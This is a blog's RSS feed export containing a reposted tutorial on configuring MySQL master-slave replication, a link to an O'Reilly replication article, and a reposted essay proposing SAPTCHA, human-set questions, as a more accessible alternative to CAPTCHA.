<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Sam Ashok</title>
	<atom:link href="http://samashok.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://samashok.wordpress.com</link>
	<description>Nothing is Impossible to Achieve!</description>
	<lastBuildDate>Mon, 28 Jun 2010 09:25:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='samashok.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Sam Ashok</title>
		<link>http://samashok.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://samashok.wordpress.com/osd.xml" title="Sam Ashok" />
	<atom:link rel='hub' href='http://samashok.wordpress.com/?pushpress=hub'/>
		<item>
		<title>How To Set Up Database Replication In MySQL</title>
		<link>http://samashok.wordpress.com/2009/07/23/how-to-set-up-database-replication-in-mysql/</link>
		<comments>http://samashok.wordpress.com/2009/07/23/how-to-set-up-database-replication-in-mysql/#comments</comments>
		<pubDate>Thu, 23 Jul 2009 11:08:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2009/07/23/how-to-set-up-database-replication-in-mysql/</guid>
		<description><![CDATA[How To Set Up Database Replication In MySQL How To Set Up Database Replication In MySQL This tutorial describes how to set up database replication in MySQL. MySQL replication allows you to have an exact copy of a database from a master server on another server (slave), and all updates to the database on the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=98&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.howtoforge.com/mysql_database_replication">How To Set Up Database Replication In MySQL</a>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><b>How To Set Up Database Replication In MySQL</b></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">This tutorial describes how to set up database replication in MySQL. MySQL replication allows you to have an exact copy of a database from a master server on another server (slave), and all updates to the database on the master server are immediately replicated to the database on the slave server so that both databases are in sync. This is not a backup policy because an accidentally issued DELETE command will also be carried out on the slave; but replication can help protect against hardware failures though. </font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">In this tutorial I will show how to replicate the database </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> from the master with the IP address <font face="Courier New, Courier, mono"><i>192.168.0.100</i></font> to a slave. Both systems (master and slave) are running <b>Debian Sarge</b>; however, the configuration should apply to almost all distributions with little or no modification. </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Both systems have MySQL installed, and the database </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> with tables and data is already existing on the master, but not on the slave. </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">I want to say firstthat this is not the only way of setting up such a system. There are many waysof achieving this goal but this is the way I take. I do not issue any guaranteethat this will work for you!</font></p>
</p>
<h2><font size="3" face="Verdana, Arial, Helvetica, sans-serif">1 Configure The Master</font></h2>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">First we have to edit </font><font face="Courier New, Courier, mono"><i>/etc/mysql/my.cnf</i></font>. We have to enable networking for MySQL, and MySQL should listen on all IP addresses, therefore we comment out these lines (if existant):</p>
<table class="" width="90%" align="center" bgcolor="#cccccc" border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td class="">
<pre>#skip-networking#bind-address            = 127.0.0.1</pre>
</td>
</tr>
</tbody>
</table>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Furthermore we have to tell MySQL for which database it should write logs (these logs are used by the slave to see what has changed on the master), which log file it should use, and we have to specify that this MySQL server is the master. We want to replicate the database </font><font face="Courier New, Courier, mono"><i>exampledb</i></font>, so we put the following lines into <font face="Courier New, Courier, mono"><i>/etc/mysql/my.cnf</i></font>:</p>
<table class="" width="90%" align="center" bgcolor="#cccccc" border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td class="">
<pre>log-bin = /var/log/mysql/mysql-bin.logbinlog-do-db=exampledbserver-id=1</pre>
</td>
</tr>
</tbody>
</table>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Then we restart MySQL:</font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">/etc/init.d/mysql restart</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Then we log into the MySQL database as </font><font face="Courier New, Courier, mono"><i>root</i></font> and create a user with replication privileges:</p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysql -u root -p<br />Enter password:</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Now we are on the MySQL shell. </font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">GRANT REPLICATION SLAVE ON *.* TO &#8216;slave_user&#8217;@'%&#8217; IDENTIFIED BY &#8216;&lt;some_password&gt;&#8217;; </font></i></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif">(Replace </font><font face="Courier New, Courier, mono"><i>&lt;some_password&gt;</i></font> with a real password!)<font size="2"><i> <br />FLUSH PRIVILEGES; </i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Next (still on the MySQL shell) do this:</font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">USE exampledb;<br /> FLUSH TABLES WITH READ LOCK;<br />SHOW MASTER STATUS;</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">The last command will show something like this:</font></p>
<table class="" width="90%" align="center" bgcolor="#cccccc" border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td class="">
<pre>+---------------+----------+--------------+------------------+| File          | Position | Binlog_do_db | Binlog_ignore_db |+---------------+----------+--------------+------------------+| mysql-bin.006 | 183      | exampledb    |                  |+---------------+----------+--------------+------------------+1 row in set (0.00 sec)</pre>
</td>
</tr>
</tbody>
</table>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Write down this information, we will need it later on the slave! </font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Then leave the MySQL shell:</font></p>
<p><font size="2" face="Courier New, Courier, mono"><i>quit;</i></font></p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">There are two possibilities to get the existing tables and data from </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> from the master to the slave. The first one is to make a database dump, the second one is to use the <font size="2" face="Courier New, Courier, mono"><i>LOAD DATA FROM MASTER;</i></font> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">command on the slave. The latter has the disadvantage the the database on the master will be <b>locked</b> during this operation, so if you have a large database on a high-traffic production system, this is not what you want, and I recommend to follow the first method in this case. However, the latter method is very fast, so I will describe both here. </font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you want to follow the first method, then do this:</font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysqldump -u root -p&lt;password&gt; &#8211;opt exampledb &gt; exampledb.sql </font></i></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif">(Replace </font><font face="Courier New, Courier, mono"><i>&lt;password&gt;</i></font> with the real password for the MySQL user <font face="Courier New, Courier, mono"><i>root</i></font>! <b>Important:</b> There is <b>no</b> space between <font face="Courier New, Courier, mono"><i>-p</i></font> and <font face="Courier New, Courier, mono"><i>&lt;password&gt;</i></font>!) </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">This will create an SQL dump of </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> in the file <font face="Courier New, Courier, mono"><i>exampledb.sql</i></font>. Transfer this file to your slave server! </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you want to go the </font><font face="Courier New, Courier, mono"><i>LOAD DATA FROM MASTER;</i></font> way then there is nothing you must do right now. </p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Finally we have to unlock the tables in </font><font face="Courier New, Courier, mono"><i>exampledb</i></font>:</p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysql -u root -p<br />Enter password:<br />UNLOCK TABLES;<br />quit;</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Now the configuration on the master is finished. On to the slave&#8230; </font><br />
<h2>2 Configure The Slave</h2>
</p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">On the slave we first have to create the database </font><font face="Courier New, Courier, mono"><i>exampledb</i></font>:</p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysql -u root -p<br />Enter password:<br />CREATE DATABASE exampledb;<br />quit;</font></i></font></p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you have made an SQL dump of </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> on the master and have transferred it to the slave, then it is time now to import the SQL dump into our newly created <font face="Courier New, Courier, mono"><i>exampledb</i></font> on the slave:</p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysql -u root -p&lt;password&gt; exampledb &lt; /path/to/exampledb.sql </font></i></font><font face="Courier New, Courier, mono"></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif">(Replace </font><font face="Courier New, Courier, mono"><i>&lt;password&gt;</i></font> with the real password for the MySQL user <font face="Courier New, Courier, mono">root</font>! <b>Important:</b> There is <b>no</b> space between <i><font face="Courier New, Courier, mono">-p</font></i> and <font face="Courier New, Courier, mono"><i>&lt;password&gt;</i></font>!) </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you want to go the </font><font face="Courier New, Courier, mono"><i>LOAD DATA FROM MASTER;</i></font> way then there is nothing you must do right now. </p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Now we have to tell MySQL on the slave that it is the slave, that the master is </font><font face="Courier New, Courier, mono"><i>192.168.0.100</i></font>, and that the master database to watch is <font face="Courier New, Courier, mono"><i>exampledb</i></font>. Therefore we add the following lines to <font face="Courier New, Courier, mono"><i>/etc/mysql/my.cnf</i></font>:</p>
<table class="" width="90%" align="center" bgcolor="#cccccc" border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td class="">
<pre>server-id=2master-host=192.168.0.100master-user=slave_usermaster-password=secretmaster-connect-retry=60replicate-d-db=exampledb</pre>
</td>
</tr>
</tbody>
</table>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Then we restart MySQL:</font></p>
<p><font size="2"><i><font face="Courier New, Courier, mono">/etc/init.d/mysql restart</font></i></font></p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you have not imported the master </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> with the help of an SQL dump, but want to go the <font face="Courier New, Courier, mono"><i>LOAD DATA FROM MASTER;</i></font> way, then it is time for you now to get the data from the master <font face="Courier New, Courier, mono"><i>exampledb</i></font>:</p>
<p><font face="Courier New, Courier, mono"><i><font size="2">mysql -u root -p<br />Enter password:<br />LOAD DATA FROM MASTER;<br />quit;</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">If you have <a>phpMyAdmin</a> installed on the slave you can now check if all tables/data from the master</font><font face="Courier New, Courier, mono"><i>exampledb</i></font> is also available on the slave <font face="Courier New, Courier, mono"><i>exampledb</i></font>. </p>
<hr />
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Finally, we must do this:</font></p>
<p><font size="2"><i><font face="Courier New, Courier, mono">mysql -u root -p<br />Enter password:<br />SLAVE STOP;</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">In the next command (still on the MySQL shell) you have to replace the values appropriately:</font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">CHANGE MASTER TO MASTER_HOST=&#8217;192.168.0.100&#8242;, MASTER_USER=&#8217;slave_user&#8217;, MASTER_PASSWORD=&#8217;</font><font face="Courier New, Courier, mono"><i><font size="2">&lt;some_password&gt;</font></i></font><font size="2">&#8216;, MASTER_LOG_FILE=&#8217;mysql-bin.006&#8242;, MASTER_LOG_POS=183;</font></i> </font></p>
<ul>
<li><i><font size="2" face="Courier New, Courier, mono">MASTER_HOST</font></i> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">is the IP address or hostname of the master (in this example it is</font> <font size="2" face="Courier New, Courier, mono"><i>192.168.0.100</i></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif">). </font></li>
<li><i><font size="2" face="Courier New, Courier, mono">MASTER_USER</font></i><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> is the user we granted replication privileges on the master.</font></li>
<li><i><font size="2" face="Courier New, Courier, mono">MASTER_PASSWORD</font></i> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">is the password of</font> <font size="2" face="Courier New, Courier, mono"><i>MASTER_USER</i></font> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">on the master.</font></li>
<li><i><font size="2" face="Courier New, Courier, mono">MASTER_LOG_FILE</font></i> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">is the file MySQL gave back when you ran</font> <font face="Courier New, Courier, mono"><i><font size="2">SHOW MASTER STATUS;</font></i></font> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">on the master.</font></li>
<li><i><font size="2" face="Courier New, Courier, mono">MASTER_LOG_POS</font></i> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">is the position MySQL gave back when you ran</font> <font face="Courier New, Courier, mono"><i><font size="2">SHOW MASTER STATUS;</font></i></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> on the master.</font> </li>
</ul>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Now all that is left to do is start the slave. Still on the MySQL shell we run</font></p>
<p><font face="Courier New, Courier, mono"><i><font size="2">START SLAVE;<br />quit;</font></i></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">That&#8217;s it! Now whenever </font><font face="Courier New, Courier, mono"><i>exampledb</i></font> is updated on the master, all changes will be replicated to <font face="Courier New, Courier, mono"><i>exampledb</i></font> on the slave. Test it! </p>
<p>  </p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><b>Links</b></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">MySQL:<a target="_blank" href="http://www.mysql.com">http://www.mysql.com</a></font>
<p></p>
<p>Source: <a href="http://www.howtoforge.com/mysql_database_replication" target="_new">http://www.howtoforge.com/mysql_database_replication</a></p>
<br />Posted in MySQL Tagged: MySQL <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/98/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=98&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2009/07/23/how-to-set-up-database-replication-in-mysql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>Advanced MySQL Replication Techniques &#8211; O&#8217;Reilly Media</title>
		<link>http://samashok.wordpress.com/2009/07/23/advanced-mysql-replication-techniques-oreilly-media/</link>
		<comments>http://samashok.wordpress.com/2009/07/23/advanced-mysql-replication-techniques-oreilly-media/#comments</comments>
		<pubDate>Thu, 23 Jul 2009 10:47:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2009/07/23/advanced-mysql-replication-techniques-oreilly-media/</guid>
		<description><![CDATA[Advanced MySQL Replication Techniques &#8211; O&#8217;Reilly Media Posted using ShareThis Posted in Uncategorized<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=97&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://shar.es/lN7Y">Advanced MySQL Replication Techniques &#8211; O&#8217;Reilly Media</a></p>
<p>Posted using <a href="http://sharethis.com">ShareThis</a></p>
<br />Posted in Uncategorized  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/97/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=97&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2009/07/23/advanced-mysql-replication-techniques-oreilly-media/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>CAPTCHA and proposed alternative, SAPTCHA</title>
		<link>http://samashok.wordpress.com/2009/02/04/captcha-and-proposed-alternative-saptcha/</link>
		<comments>http://samashok.wordpress.com/2009/02/04/captcha-and-proposed-alternative-saptcha/#comments</comments>
		<pubDate>Wed, 04 Feb 2009 08:02:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[SAPTCHA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2009/02/04/captcha-and-proposed-alternative-saptcha/</guid>
		<description><![CDATA[Introduction (skip to next section if you are familiar with concept of CAPTCHA) CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. [Wikipedia / Captcha] Simply put, CAPTCHA is a set of methods commonly used to block automated account registration and similar massive abuse by making it costlier to spammer. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=96&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h2>Introduction</h2>
<p>(skip to next section if you are familiar with concept of CAPTCHA)</p>
<p>CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. <a href="http://en.wikipedia.org/wiki/Captcha" target="_new">[Wikipedia / Captcha]</a></p>
<p>Simply put, CAPTCHA is a set of methods commonly used to block automated account registration and similar massive abuse by making it costlier to spammer. Most common type of CAPTCHA is visual CAPTCHAs that test for image recognition. Though, at current moment, computers (using good software) is no worse than humans at single character image recognition (<a href="http://www.ceas.cc/papers-2005/160.pdf" target="_new">source</a>) (fortunately spammers don&#8217;t bother to use such software yet.)</p>
<p>Most likely you have already been tested by CAPTCHAs &#8211; that&#8217;s those images od distorted and obstructed letters that you must enter into text field to complete registration of email account or to post reply to blog.</p>
<p>Verbal CAPTCHA would not discriminate against vision impaired, but computer will only be able to generate very limited subset of questions and thus it would be relatively simple to defeat such CAPTCHA. Audio CAPTCHAs is uncommon because one would still need visual one and it would double effort.</p>
<p>CAPTCHAs has numerous problems(see wikipedia article linked above for good overview); there is existing methods of character recognition, plus it is often possible to defeat captcha knowing the algorithm it uses.</p>
<p>Intuitively, while computers is not smart enough to pass true <a href="http://en.wikipedia.org/wiki/Turing_test" target="_new">Turing test</a>, computers may be smart enough to fool other computers.</p>
<p>In some CAPTCHAs, the image is obscured in a way that makes it harder to read for human, but will have no effect on computer &#8211; for example, computer won&#8217;t have any problem at all filtering out colored background, but it can confuse human(especially colorblind).</p>
<p>Often, human don&#8217;t know how many letters should be there, and random lines may look like yet another distorted letter, confusing human but not computer that knows how many letters should be there. Some letters in common fonts differ too little to be reliably recognized by human when distorted (such as 0,O ; I,l,i,!,j ; vv,w and so on). Humans recognize heavily distorted letters in handwriting based on the context, but letters in CAPTCHAs lack context.Last but not least, such methods unnecessarily discriminate against disabled who can not see the image.</p>
<h2>SAPTCHA.</h2>
<p>SAPTCHA stands for Semi Automatic Public Turing Test to Tell Computers and Humans Apart.</p>
<p>The key concept is same as with CAPTCHA: user is presented with test question or instructions and must give correct answer to use resource. Main difference is that computer does not try to automatically generate &#8220;unique&#8221; test questions on each query; only verification of answer is automatic. Instead, unique test question and answer[s] is set by moderator or owner when SAPTCHA is installed, and should be easy to change if needed.</p>
<p>SAPTCHA is proposed as more accessible alternative to CAPTCHA that may replace CAPTCHA in services such as most blogs and forums. SAPTCHA works as lightweight CAPTCHA.</p>
<p>The concept follows from observation that there is many cases where automated generation of unique test question or image does not add much to prevention of abuse &#8211; spammer do not need to pass test more than once on same forum or blog anyway. Often, there&#8217;s no human spammer interacting with website at all [who wouldn't love to think that his site is so important that it is spammed personally <img src='http://s2.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> ]; in such cases static question is not worse at stopping bot than dynamic. Human generated questions has much broader diversity and is thus harder for computer to answer. It must be also noted that CAPTCHA itself is not really &#8220;completely automatic&#8221; &#8211; human has to write and maintain test software, which will not change often but is costly to develop.</p>
<p>Example questions: User is given instruction like &#8220;write [no i'm not a computer!] in this text field&#8221; or &#8220;write &#8216;i&#8217;m human&#8217; in reverse&#8221; or &#8220;write[or copy-paste] web address of this page there&#8221; (please don&#8217;t use too similar things. No default questions and answers. Think up something yourself. Don&#8217;t try to be clever. It should be not more complex to understand and do than rest of registration instruction and resource usage, and thus shouldn&#8217;t decrease website&#8217;s accessability(!). It&#8217;s better if answer is more than 1 character long or if there is delay or block for bots that &#8220;try again&#8221;.)</p>
<p>Bots can try to understand text written by human in normal language (very hard problem in AI) or try to guess (some delay can make it pointless) or try some common test answers if any (but the common test questions and answers will quickly disappear)</p>
<p>Spammer have to manually answer the question to start spamming. This is exactly same problem as with CAPTCHA at registration. Similarly to CAPTCHA at registration, human invervention is necessary to stop spam. &#8211; account must be banned and for SAPCHA question must be changed(if bot can reuse answer automatically). </p>
<p>In a way, SAPTCHA can be viewed as light weight disposable CAPTCHA test that is cheap to replace when it get compromised. </p>
<h2>Comparison</h2>
<h4>Sample use scenarios</h4>
<p>SAPTCHA</p>
<p>s.0) Normal user comes accross your blog. If he can answer question, he can post reply, unless you made bad question/instructions. If user can&#8217;t read your question, probably he can&#8217;t read your blog either, so the SAPTCHA shouldn&#8217;t make it less accessible.</p>
<p>s.1) Spammer bot comes accross your blog. No spamming happens. Bots can&#8217;t understand human language yet.</p>
<p>s.2) Spammer human comes accross your blog/forum, answer question, register account, and possibly add answer and account to spambot database or proceeds to spam manually. You are spammed. It will take a moderator to ban spammer and stop spam; the banning form may also ask moderator for new question and new answer that needs to be provided if spamming was done by bot that &#8220;knows&#8221; answer to question.</p>
<p>CAPTCHA</p>
<p>s.0) Normal user comes accross your blog/forum. If he can see, and CAPTCHA is simple he can post reply with small hastle if he doesn&#8217;t have to pass CAPTCHA every time he replies. If CAPTCHA is &#8220;unbreakable&#8221; or uses bad colors, he will need few tries and is going to get annoyed, especially so if he need to pass it for every reply. If he is blind or otherwise can&#8217;t see it, no way.</p>
<p>s.1) Spammer bot comes accross your blog. You might get spammed if bot can recognize image (it is possible if you are using popular CAPTCHA), but most likely you won&#8217;t.</p>
<p>s.2) Spammer human comes accross your blog/forum. He can answer question, register account, add it to spambot database. You are spammed. It will take moderator to ban the bot, and delete spam[assuming that spam filters alone don't suffice without CAPTCHA]; so you still need human intervention from your side. As have been said before, if you&#8217;d ask to pass CAPTCHA for every message it&#8217;d be too annoying for normal users as well.</p>
<h2>Comparison of SAPTCHA versus CAPTCHA features</h2>
<p>Advantages of SAPTCHA over CAPTCHA:</p>
<ol>
<li> SAPTCHA software is much easier to implement than CAPTCHA</li>
<li> Textual SAPTCHA does not discriminate against disabled who can use internet. [Audio CAPTCHA plus visual CAPTCHA would double effort and is thus very uncommon in practice]</li>
<li>There is methods for breaking image based CAPTCHAs. If you use popular CAPTCHA, you may still get spammed by entirely automatic bot. SAPTCHAs can be much more varied and there won&#8217;t be common method of breaking until it becomes possible for computers to interpret human instructions in normal human language.</li>
</ol>
<p>Advantages of CAPTCHA over SAPTCHA (disadvantages of SAPTCHA):</p>
<ol>
<li>With SAPTCHA, when banning spammer, moderator must enter new question and answer. With CAPTCHA, though, there&#8217;s point 1 above (&amp; CAPTCHA code won&#8217;t remain useful forever either), so for not extremely popular websites it seems highly unlikely that even in long run CAPTCHA would save work.</li>
<li> If SAPTCHA is used to protect registration, it is easier to register many accounts at once than with CAPTCHA; may matter with popular email services.</li>
<li> Verbal SAPTCHA is problematic when it is multi-language resource that needs frequent changes. </li>
<li> When it is something like photo gallery, visual CAPTCHA is allright as it doesn&#8217;t contribute to inaccessability.</li>
</ol>
<h2>Conclusion:</h2>
<p>SAPTCHA can be viable alternative to CAPTCHA for web resources like forums and blogs and in other situations when spammer can not afford to target resources individually. With textual resources, SAPTCHA does not lessen accessability of resource.</p>
<p>It is suggested that forum and blogging software should offer support for SAPTCHA in addition to existing support for CAPTCHA, thus allowing administrator to use SAPTCHA and switch to CAPTCHA only when and if SAPTCHA is found to be really inadequate in this situation (which is expected to happen only on very popular web resources). By the method of operation, SAPTCHA can give only limited protection against account registration abuses when abuser is willing to solve SAPTCHA and consequently run bot that register really many accounts (e.g. for use of email as storage), which would be prevented by CAPTCHA on every registration.<br />
<h2>Live example of question</h2>
<p>John had one thousand apples and five oranges. He ate as many of his apples as there is letters in word &#8220;apple&#8221;. Also he ate two bananas <img src='http://s2.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> . How many appl es John have?</p>
<p>Your answer: </p>
<p>If you are annoyed by CAPTCHA, think about alternatives and discuss concept of SAPTCHA with others. Make the best meme win. </p>
<p>Source: <a href="http://dmytry.pandromeda.com/texts/captcha_and_saptcha.html" target="_new">http://dmytry.pandromeda.com/</a></p>
